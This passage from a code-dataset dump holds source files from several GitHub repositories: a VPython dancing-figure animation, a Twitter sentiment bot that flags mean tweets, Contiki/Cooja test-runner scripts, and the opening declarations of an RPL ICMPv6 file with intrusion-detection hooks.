axis=vec(0, 0, 10))\n # ll.pos.x += 0.01\n\n i += 1\n\n\ndef Step25(h, t, la, ra, ll, rl):\n sleep(0.1)\n while t.pos.x > 0:\n rate(15)\n t.pos.x -= 0.8\n h.pos.x -= 0.8\n la.pos.x -= 0.95\n la.pos.z += 0.225\n la.pos.y -= 0.01\n ra.pos.x -= 0.85\n ra.pos.z += 0.05\n ll.pos.x -= 0.9\n ll.pos.z += 0.1\n rl.pos.x -= 0.95\n rl.pos.z += 0.1\n t.rotate(angle=-pi / 3.9, axis=vec(0, 10, 0.5))\n h.rotate(angle=-pi / 3.9, axis=vec(0, 10, 0.5))\n la.rotate(angle=pi / 20, axis=vec(2, 5, 0))\n ra.rotate(angle=pi / 3.9, axis=vec(0, 10, 0.5))\n ll.rotate(angle=-pi / 2, axis=vec(0, 10, 0.5))\n rl.rotate(angle=-pi / 3.9, axis=vec(0, 10, 0.5))\n\n\ndef Step26(h, t, la, ra, ll, rl):\n i = 0\n while i <= 10:\n rate(25)\n h.rotate(angle=pi / 50, axis=vec(0, 10, 0.5))\n t.rotate(angle=pi / 100, axis=vec(0, 10, 0.5))\n rl.rotate(angle=pi / 100, axis=vec(0, -10, 0))\n rl.pos.x += 0.02\n la.rotate(angle=-pi / 15, axis=vec(0, 0, 10))\n la.pos.x += 0.02\n ra.rotate(angle=pi / 15, axis=vec(0, 0, 10))\n\n i += 1\n\n\nhead = Head()\ntorso = Torso()\nleftarm = Leftarm()\nrightarm = Rightarm()\nleftleg = Leftleg()\nrightleg = Rightleg()\n\nsleep(2)\nStep1(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.05)\nStep2(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep3(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep4(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep5(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep6(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep3(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep4(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep5(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep6(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep7(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep8(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep9(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.2)\nStep10(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep11(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep10(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep11(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep12(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.2)\nStep13(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep14(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep15(head, torso, leftarm, rightarm, leftleg, rightleg)\nsleep(0.1)\nStep16(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep17(head, torso, leftarm, rightarm, leftleg, rightleg)\n# from now on, functions have sleep built into them\nStep18(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep19(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep20(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep20(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep20(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep21(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep22(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep23(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep24(head, torso, leftarm, rightarm, leftleg, rightleg)\nStep25(head, torso, leftarm, rightarm, leftleg, 
rightleg)\nStep26(head, torso, leftarm, rightarm, leftleg, rightleg)"
},
{
"alpha_fraction": 0.7769953012466431,
"alphanum_fraction": 0.7852112650871277,
"avg_line_length": 120.64286041259766,
"blob_id": "b384296aae4af60bd3fa861c821d066636d50bbf",
"content_id": "b05be7cf98fd9e79b91d1541967b581358177393",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 1704,
"license_type": "no_license",
"max_line_length": 352,
"num_lines": 14,
"path": "/README.md",
"repo_name": "imotyashok/dancing-dude",
"src_encoding": "UTF-8",
"text": "# Dancing Dude \n## Project Info\nThis was a final project for a course I took during the fall of 2018. It is a simple, short 3D animation of a little stick figure dancing. It was created using the online GlowScript IDE and was written in python 2.7 using the VPython library (which unfortunately makes the program a little outdated). \n\nTo view the animation, you can follow this link: https://www.glowscript.org/#/user/Iryna/folder/MyPrograms/program/finalprojectwithfunctions\n\n## Possible Improvements \nThis was written a long time ago when I was very new to object oriented programming (and programming in general) using an older version of VPython and python. I am still proud of this project since it took countless hours to make and I like the resulting animation, but looking back on it now, there are a number of ways in which it could be improved. \n#### Code length\nThe first thing you may notice right away is that the code for this is long. Very long. There are around 650 lines of code for a 10-15 second animation. A large number of lines of code isn't necessarily bad, but in my case, a lot of the code seems very repetitive. I could simplify the code a lot more if I used better defined functions. \n#### Main function\nThis isn't an absolute necessity, but if I were to rewrite this program, I would include a main function for clarity and organization purposes.\n#### Classes\nThe program does not include any classes, but it would make sense to make a StickPerson class where I would initialize each component of the stick person (arms, head, torso, legs) to make the program more object oriented and organized rather than just making separate functions for the arms, head, torso, and legs. \n"
}
] | 2 |
ctaylor08/nice-bot | https://github.com/ctaylor08/nice-bot | 7cd0974d1422f6c3e7366054fa07c703d3d19afc | 2a4fca27caa14af35b08b4306ddbfc5eb5f073c5 | 552196f465eed3e056e3078c56cbc251c35630c5 | refs/heads/master | 2023-02-17T04:22:50.270879 | 2016-12-02T03:09:02 | 2016-12-02T03:09:02 | 74,526,074 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.573383092880249,
"alphanum_fraction": 0.5779436230659485,
"avg_line_length": 31.608108520507812,
"blob_id": "c250581587c994237fe4ccc47c1809ebdab983d3",
"content_id": "0c41b84f193a718921a712845f2b133fc93e207b",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 2412,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 74,
"path": "/nicebot/__init__.py",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "#usr/bin/python3\nimport os\nimport configparser\nimport json\nimport logging\nimport re\nfrom tweepy import Stream, OAuthHandler\nfrom tweepy.streaming import StreamListener\ntry:\n import meany\nexcept ImportError:\n from . import meany\n\nconfig = configparser.ConfigParser()\nconfig.read(os.path.join(os.path.dirname(__file__), 'nicebot_conf.ini'))\ntwitter_auth = config['twitter_auth']\nlogging.basicConfig(filename='nicelog.log', filemode='w', level=logging.INFO)\n\nfrom nltk.corpus import stopwords\nconfig['random_stuff']['words'] = ','.join(list(set(stopwords.words('english'))))\n\nclass Listener(StreamListener):\n\n def __init__(self, log=True):\n self.log = log\n\n def on_data(self, data):\n all_data = json.loads(data)\n tweet = all_data.get('text')\n if tweet and '@' in tweet and not tweet.startswith('RT '):\n tweet_body = tweet.replace('\\n', ' ').strip()\n tweet_text = re.sub(r'([@|#][\\S]{1,})|(http[s|]:\\/\\/[\\S]{1,})', '', tweet_body)\n mean = meany.meany(tweet_text)\n mean.is_mean()\n if mean.mean:\n print('### MEAN ###\\n')\n print(tweet_body)\n print('')\n elif not mean.mean:\n print('### NOT MEAN ###\\n')\n print(tweet_body)\n print('')\n if self.log:\n logging.info(str(mean.mean) + ' <<< ' + tweet_body + ' >>>')\n return True\n \n def on_error(self, status):\n logging.warning(status)\n \nauth = OAuthHandler(twitter_auth['ckey'], twitter_auth['csecret'])\nauth.set_access_token(twitter_auth['atkn'], twitter_auth['asecret'])\n\n\ndef enable_stream(which='nice_stuff', **kwargs):\n if which not in ['nice_stuff', 'mean_stuff', 'random_stuff']:\n raise ValueError(\"which param must be either 'nice_stuff', 'mean_stuff', or 'random_stuff'\")\n twitterStream = Stream(auth, Listener(**kwargs))\n try:\n twitterStream.filter(track=config[which]['words'].split(','))\n except KeyboardInterrupt:\n print('\\nnicebot disabled')\n \n \nif __name__ == '__main__':\n import time\n print(\"Let's kill em with kindness!\")\n print(\"- press Ctrl+c to disable at anytime\")\n print(\"- Starting in\")\n s = 1\n for sec in ['5','4','3','2','1']:\n print(' '*s + sec)\n s += 1\n time.sleep(1)\n enable_stream(which='random_stuff')"
},
{
"alpha_fraction": 0.8290598392486572,
"alphanum_fraction": 0.8290598392486572,
"avg_line_length": 57.5,
"blob_id": "3b66b2b3907f0277b5edeca986a2def5e085d654",
"content_id": "75591df401954ddf3653ab25346379b86f370baf",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 117,
"license_type": "no_license",
"max_line_length": 105,
"num_lines": 2,
"path": "/README.md",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "# nice-bot\nPython program that performs sentiment-analysis against Twitter, responding to mean tweets with nice ones\n"
},
{
"alpha_fraction": 0.6307870149612427,
"alphanum_fraction": 0.6342592835426331,
"avg_line_length": 24.41176414489746,
"blob_id": "8d50514d8f2aa887658fc402a8e5ce7d3435b217",
"content_id": "4ad09c7319c143abc49763e5522185d78cbc84a5",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 864,
"license_type": "no_license",
"max_line_length": 67,
"num_lines": 34,
"path": "/nicebot/meany.py",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "from nltk.tokenize import word_tokenize\nfrom nltk.corpus import stopwords\nfrom nltk.stem import PorterStemmer\nimport pickle\nimport os\n\nf = open(os.path.join('sample_data', 'lr_classifier.pickle'), 'rb')\nmean_classifier = pickle.load(f)\nf.close()\n\nf = open(os.path.join('sample_data', 'word_features.pickle'), 'rb')\nword_features = pickle.load(f)\nf.close()\n\ndef find_features(doc):\n words = word_tokenize(doc)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n return features\n\nclass meany(object):\n \n def __init__(self, text):\n self.text = text\n self.features = find_features(self.text)\n self.mean = 0\n \n def is_mean(self):\n '''\n Determines if the self.text is mean or not\n self.text -> bool (1 or 0)\n '''\n self.mean = mean_classifier.classify(self.features)\n"
},
{
"alpha_fraction": 0.7157712578773499,
"alphanum_fraction": 0.723088800907135,
"avg_line_length": 38.04511260986328,
"blob_id": "aa245097f044f222d7f4573e01d4417197ac36c4",
"content_id": "f33249cbabdf4032698b55d39596fe33bce6690d",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 5193,
"license_type": "no_license",
"max_line_length": 130,
"num_lines": 133,
"path": "/nicebot/sample_data/test_classifiers.py",
"repo_name": "ctaylor08/nice-bot",
"src_encoding": "UTF-8",
"text": "import nltk\nfrom nltk.corpus import stopwords\nfrom nltk.tokenize import word_tokenize\nfrom nltk.classify.scikitlearn import SklearnClassifier\nfrom sklearn.naive_bayes import MultinomialNB, BernoulliNB\nfrom sklearn.linear_model import LogisticRegression, SGDClassifier\nfrom sklearn.svm import SVC, LinearSVC, NuSVC\nfrom nltk.classify import DecisionTreeClassifier, MaxentClassifier, ClassifierI\nfrom statistics import mode\nimport random\nimport pickle\n\ndef pickle_it(obj, fname):\n f = open(fname, 'wb')\n pickle.dump(obj, f)\n f.close()\n\nwith open('mean.txt') as f:\n data = f.read()\n mean_tweets = [(line.lower(), 1) for line in data.split('\\n')]\n mean_tkn_fltrd = [w.lower() for w in word_tokenize(data) if w.lower() not in set(stopwords.words('english'))]\n \nwith open('nice.txt') as f:\n data = f.read()\n nice_tweets = [(line.lower(), 0) for line in data.split('\\n')]\n nice_tkn_fltrd = [w.lower() for w in word_tokenize(data) if w.lower() not in set(stopwords.words('english'))]\n \nall_tweets = mean_tweets + nice_tweets\nall_tkn_fltrd = mean_tkn_fltrd + nice_tkn_fltrd\n\nall_dist = nltk.FreqDist(all_tkn_fltrd)\n\nword_features = list(all_dist.keys())\npickle_it(word_features, 'word_features.pickle')\n\ndef find_features(doc):\n words = word_tokenize(doc)\n features = {}\n for w in word_features:\n features[w] = (w in words)\n \n return features\npickle_it(find_features, 'find_features.pickle')\n \nfeaturesets = [(find_features(tweet), score) for (tweet, score) in all_tweets]\nrandom.shuffle(featuresets)\n\nhalf = int(len(featuresets)/2)\n\ntraining_set = featuresets[:half]\ntesting_set = featuresets[half:]\n\n\nclass VoteClassifier(ClassifierI):\n def __init__(self, *classifiers):\n self._classifiers = classifiers\n\n def classify(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n return mode(votes)\n\n def confidence(self, features):\n votes = []\n for c in self._classifiers:\n v = c.classify(features)\n votes.append(v)\n\n choice_votes = votes.count(mode(votes))\n conf = choice_votes / len(votes)\n return conf\n\n \nclassifier = nltk.NaiveBayesClassifier.train(training_set)\nprint(\"Original Naive Bayes Algo accuracy percent:\", (nltk.classify.accuracy(classifier, testing_set))*100)\nclassifier.show_most_informative_features(15)\npickle_it(classifier, 'nb_classifier.pickle')\n\nDT_classifier = DecisionTreeClassifier.train(training_set)\nprint(\"DT_classifier accuracy percent:\", (nltk.classify.accuracy(DT_classifier, testing_set))*100)\npickle_it(DT_classifier, 'dt_classifier.pickle')\n\n#ME_classifier = MaxentClassifier.train(training_set)\n#print(\"ME_classifier accuracy percent:\", (nltk.classify.accuracy(ME_classifier, testing_set))*100)\n#pickle_it(ME_classifier, 'me_classifier.pickle')\n\nMNB_classifier = SklearnClassifier(MultinomialNB())\nMNB_classifier.train(training_set)\nprint(\"MNB_classifier accuracy percent:\", (nltk.classify.accuracy(MNB_classifier, testing_set))*100)\npickle_it(MNB_classifier, 'mnb_classifier.pickle')\n\nBernoulliNB_classifier = SklearnClassifier(BernoulliNB())\nBernoulliNB_classifier.train(training_set)\nprint(\"BernoulliNB_classifier accuracy percent:\", (nltk.classify.accuracy(BernoulliNB_classifier, testing_set))*100)\npickle_it(BernoulliNB_classifier, 'bnb_classifier.pickle')\n\nLogisticRegression_classifier = SklearnClassifier(LogisticRegression())\nLogisticRegression_classifier.train(training_set)\nprint(\"LogisticRegression_classifier accuracy percent:\", 
(nltk.classify.accuracy(LogisticRegression_classifier, testing_set))*100)\npickle_it(LogisticRegression_classifier, 'lr_classifier.pickle')\n\nSGDClassifier_classifier = SklearnClassifier(SGDClassifier())\nSGDClassifier_classifier.train(training_set)\nprint(\"SGDClassifier_classifier accuracy percent:\", (nltk.classify.accuracy(SGDClassifier_classifier, testing_set))*100)\npickle_it(SGDClassifier_classifier, 'sgdc_classifier.pickle')\n\nSVC_classifier = SklearnClassifier(SVC())\nSVC_classifier.train(training_set)\nprint(\"SVC_classifier accuracy percent:\", (nltk.classify.accuracy(SVC_classifier, testing_set))*100)\npickle_it(SVC_classifier, 'svc_classifier.pickle')\n\nLinearSVC_classifier = SklearnClassifier(LinearSVC())\nLinearSVC_classifier.train(training_set)\nprint(\"LinearSVC_classifier accuracy percent:\", (nltk.classify.accuracy(LinearSVC_classifier, testing_set))*100)\npickle_it(LinearSVC_classifier, 'lsvc_classifier.pickle')\n\nNuSVC_classifier = SklearnClassifier(NuSVC())\nNuSVC_classifier.train(training_set)\nprint(\"NuSVC_classifier accuracy percent:\", (nltk.classify.accuracy(NuSVC_classifier, testing_set))*100)\npickle_it(NuSVC_classifier, 'nsvc_classifier.pickle')\n\n\n\nvoted_classifier = VoteClassifier(\n NuSVC_classifier,\n LinearSVC_classifier,\n MNB_classifier,\n BernoulliNB_classifier,\n LogisticRegression_classifier)\n\nprint(\"voted_classifier accuracy percent:\", (nltk.classify.accuracy(voted_classifier, testing_set))*100)\n"
}
] | 4 |
philok93/IoTIDS | https://github.com/philok93/IoTIDS | 97caf05bb65647c0f7ed4c8c5044f99ab3b8c840 | 90e88780408d491110fd39c2c5aded90e05ca586 | b2c50961cf21569441fd3d09c0274942f6f044da | refs/heads/master | 2023-04-11T15:12:15.083421 | 2021-06-29T19:57:51 | 2021-06-29T19:57:51 | 141,921,505 | 0 | 0 | null | null | null | null | null | [
{
"alpha_fraction": 0.6207800507545471,
"alphanum_fraction": 0.6479842662811279,
"avg_line_length": 25.53043556213379,
"blob_id": "8ba310da0bb87fc501b20564fa66b8557646616a",
"content_id": "c587d2eb6eff6cef714a0613a00f1397bd48caba",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 3051,
"license_type": "permissive",
"max_line_length": 73,
"num_lines": 115,
"path": "/tools/cooja/Testing/RUN_only1.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Usage\nif [ $# -eq 2 ]; then\n REPEATS=$1\n TEST=$2\nelse\n echo \"Usage: $0 <nr_repeats> <test>\"\n echo \"Example: $0 10 cooja_helloworld\"\n exit 1\nfi\n\n# Locate Contiki/COOJA\nif [ -z \"$CONTIKI\" ]; then\n if [ -z \"$CONTIKI_HOME\" ]; then\n \tCONTIKI_HOME=../../..\n fi\n CONTIKI=$CONTIKI_HOME\nfi\n\n# Clean up\nrm -f *.log *.cooja_log\nrm -fr se obj_cooja\nrm -f symbols.c symbols.h\n\n# Compile COOJA\necho \">>>>>>> Building COOJA <<<<<<<<\"\n(cd $CONTIKI/tools/cooja && ant clean && ant jar)\nif [ \"$?\" != \"0\" ]; then\n echo \"Compilation of COOJA failed\"\n exit 1\nfi\n\nTEST1=read_IDS_allnodes_sciptIDS5_clone\nTEST2=read_IDS_allnodes_sciptIDS1-clone\n#TEST3=read_IDS_allnodes_sciptIDS2-clone\n# TEST4=read_IDS_allnodes_sciptIDS4-clone\n# TEST5=read_IDS_allnodes_sciptIDS5_clone\n# TEST6=read_IDS_allnodes_sciptIDS6-clone\n# TEST7=read_IDS_allnodes_sciptIDS7-clone\n# TEST8=read_IDS_allnodes_sciptIDS8-clone\n# TEST9=read_IDS_allnodes_sciptIDS9-clone\n# TEST10=read_IDS_allnodes_sciptIDS10-clone\n\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST1-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST1 RUN_REPEATED_LAST.log\n mv $TEST1.log clone_test/$TEST1-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST2-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST2 RUN_REPEATED_LAST.log\n mv $TEST2.log clone_test/$TEST2-$COUNTER.log\ndone\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST4-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST4 RUN_REPEATED_LAST.log\n# mv $TEST4.log clone_test/$TEST4-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST5-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST5 RUN_REPEATED_LAST.log\n# mv $TEST5.log clone_test/$TEST5-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST6-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST6 RUN_REPEATED_LAST.log\n# mv $TEST6.log clone_test/$TEST6-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST7-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST7 RUN_REPEATED_LAST.log\n# mv $TEST7.log clone_test/$TEST7-$COUNTER.log\n# done\n\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST8-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST8 RUN_REPEATED_LAST.log\n# mv $TEST8.log clone_test/$TEST8-$COUNTER.log\n# done\n\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST9-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST9 RUN_REPEATED_LAST.log\n# mv $TEST9.log clone_test/$TEST9-$COUNTER.log\n# done\n\n# for COUNTER in `seq 1 $REPEATS`;\n# do\n# echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST10-$COUNTER.log <<<<<<<<\"\n# bash RUN_TEST.sh $TEST10 RUN_REPEATED_LAST.log\n# mv $TEST10.log clone_test/$TEST10-$COUNTER.log\n# done\n\n\necho\ncat RUN_REPEATED_LAST.log\necho\necho \">>>>>>> DONE! Test logs stored in $TEST1-[1-$REPEATS].log <<<<<<<<\"\n"
},
{
"alpha_fraction": 0.6193993091583252,
"alphanum_fraction": 0.6489413976669312,
"avg_line_length": 21.318681716918945,
"blob_id": "aad15343d74755767e69c7c2718d33ef14178297",
"content_id": "fb6080212bdb8837cc2de55a104d11084259bb21",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 2031,
"license_type": "permissive",
"max_line_length": 72,
"num_lines": 91,
"path": "/tools/cooja/Testing/RUN_mine_mals.sh",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "#!/bin/bash\n\n# Usage\n#RUNS 1 MLAICIOUS AND 3 NORMAL NODES\nif [ $# -eq 2 ]; then\n REPEATS=$1\n TEST=$2\nelse\n echo \"Usage: $0 <nr_repeats> <test>\"\n echo \"Example: $0 10 cooja_helloworld\"\n exit 1\nfi\n\n# Locate Contiki/COOJA\nif [ -z \"$CONTIKI\" ]; then\n if [ -z \"$CONTIKI_HOME\" ]; then\n \tCONTIKI_HOME=../../..\n fi\n CONTIKI=$CONTIKI_HOME\nfi\n\n# Clean up\nrm -f *.log *.cooja_log\nrm -fr se obj_cooja\nrm -f symbols.c symbols.h\n\n# Compile COOJA\necho \">>>>>>> Building COOJA <<<<<<<<\"\n(cd $CONTIKI/tools/cooja && ant clean && ant jar)\nif [ \"$?\" != \"0\" ]; then\n echo \"Compilation of COOJA failed\"\n exit 1\nfi\n\nTEST11=testwith1mals\nTEST2=testwith2mals\nTEST3=testwith3mals\nTEST4=testwith4mals\nTEST5=testwith5mals\nTEST6=testwith6mals\n\n\n# Run tests\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST11-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST11 RUN_REPEATED_LAST.log\n mv $TEST11.log $TEST11-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST2-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST2 RUN_REPEATED_LAST.log\n mv $TEST2.log $TEST2-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST3-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST3 RUN_REPEATED_LAST.log\n mv $TEST3.log $TEST3-$COUNTER.log\ndone\n\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST4-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST4 RUN_REPEATED_LAST.log\n mv $TEST4.log $TEST4-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST5-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST5 RUN_REPEATED_LAST.log\n mv $TEST5.log $TEST5-$COUNTER.log\ndone\n\nfor COUNTER in `seq 1 $REPEATS`;\ndo\n echo \">>>>>>> Test $COUNTER/$REPEATS: $TEST6-$COUNTER.log <<<<<<<<\"\n bash RUN_TEST.sh $TEST6 RUN_REPEATED_LAST.log\n mv $TEST6.log $TEST6-$COUNTER.log\ndone\n\n\necho\ncat RUN_REPEATED_LAST.log\necho\necho \">>>>>>> DONE! Test logs stored in $TEST-[1-$REPEATS].log <<<<<<<<\"\n"
},
{
"alpha_fraction": 0.4928741157054901,
"alphanum_fraction": 0.5112826824188232,
"avg_line_length": 31.171939849853516,
"blob_id": "a48598f37a0cea3be195f05e73952e89e5096eaf",
"content_id": "c24dc7faca1777302835830ab12432ec79da29eb",
"detected_licenses": [
"BSD-3-Clause"
],
"is_generated": false,
"is_vendor": false,
"language": "C",
"length_bytes": 53888,
"license_type": "permissive",
"max_line_length": 200,
"num_lines": 1675,
"path": "/os/net/routing/rpl-lite/rpl-icmp6.c",
"repo_name": "philok93/IoTIDS",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright (c) 2010, Swedish Institute of Computer Science.\n * All rights reserved.\n *\n * Redistribution and use in source and binary forms, with or without\n * modification, are permitted provided that the following conditions\n * are met:\n * 1. Redistributions of source code must retain the above copyright\n * notice, this list of conditions and the following disclaimer.\n * 2. Redistributions in binary form must reproduce the above copyright\n * notice, this list of conditions and the following disclaimer in the\n * documentation and/or other materials provided with the distribution.\n * 3. Neither the name of the Institute nor the names of its contributors\n * may be used to endorse or promote products derived from this software\n * without specific prior written permission.\n *\n * THIS SOFTWARE IS PROVIDED BY THE INSTITUTE AND CONTRIBUTORS ``AS IS'' AND\n * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE\n * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE\n * ARE DISCLAIMED. IN NO EVENT SHALL THE INSTITUTE OR CONTRIBUTORS BE LIABLE\n * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL\n * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS\n * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)\n * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT\n * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY\n * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF\n * SUCH DAMAGE.\n *\n * This file is part of the Contiki operating system.\n *\n */\n\n/**\n * \\addtogroup rpl-lite\n * @{\n *\n * \\file\n * ICMP6 I/O for RPL control messages.\n *\n * \\author Joakim Eriksson <[email protected]>, Nicolas Tsiftes <[email protected]>,\n * Simon Duquennoy <[email protected]>\n * Contributors: Niclas Finne <[email protected]>, Joel Hoglund <[email protected]>,\n * Mathieu Pouillot <[email protected]>,\n * George Oikonomou <[email protected]> (multicast)\n */\n\n#include \"net/routing/rpl-lite/rpl.h\"\n#include \"net/ipv6/uip-icmp6.h\"\n#include \"net/packetbuf.h\"\n#include \"lib/random.h\"\n#include \"net/routing/rpl-lite/rpl-neighbor.h\"\n#include \"net/link-stats.h\"\n\n#if IDS_SERVER == 1 || IDS_CLIENT==1 || IDS_OF==1\n#include \"ids.h\"\n#include \"net/netstack.h\"\n\n#include \"contiki.h\"\n#include \"net/routing/routing.h\"\n\n#endif\n\n#include <limits.h>\n\n/* Log configuration */\n#include \"sys/log.h\"\n#define LOG_MODULE \"RPL\"\n#define LOG_LEVEL LOG_LEVEL_RPL\n\n/*---------------------------------------------------------------------------*/\n#define RPL_DIO_GROUNDED 0x80\n#define RPL_DIO_MOP_SHIFT 3\n#define RPL_DIO_MOP_MASK 0x38\n#define RPL_DIO_PREFERENCE_MASK 0x07\n\n/*---------------------------------------------------------------------------*/\nstatic void dis_input(void);\nstatic void dio_input(void);\nstatic void dao_input(void);\n\n\n#if MALICIOUS==0 && IDS_CLIENT ==1 && IDS_SERVER == 0 && !CLONE_ATTACK && IDS_OF==1\nfw_stats nbr_stats;\n#endif\n\n#if IDS_OF==1\n uint32_t last_time_from_ids=0;\n#endif\n\n//Added IDS\n#if IDS_CLIENT==1 || IDS_SERVER == 1\n//void ids_output(uip_ipaddr_t *addr);\n//void ids_input(void);\nuip_ipaddr_t IdsServerAddr;\nuint16_t ip_end = 0;\nuint8_t endofIP = 0;\nuint16_t countInNodes = 0;\nextern uint8_t flag_is_ids;\n#endif /*IDS_CLIENT || IDS_SERVER*/\n\n#if IDS_CLIENT==1\nuint32_t DISvalues = 0;\nuint32_t intervals = 0;\nextern ids_ctr_t 
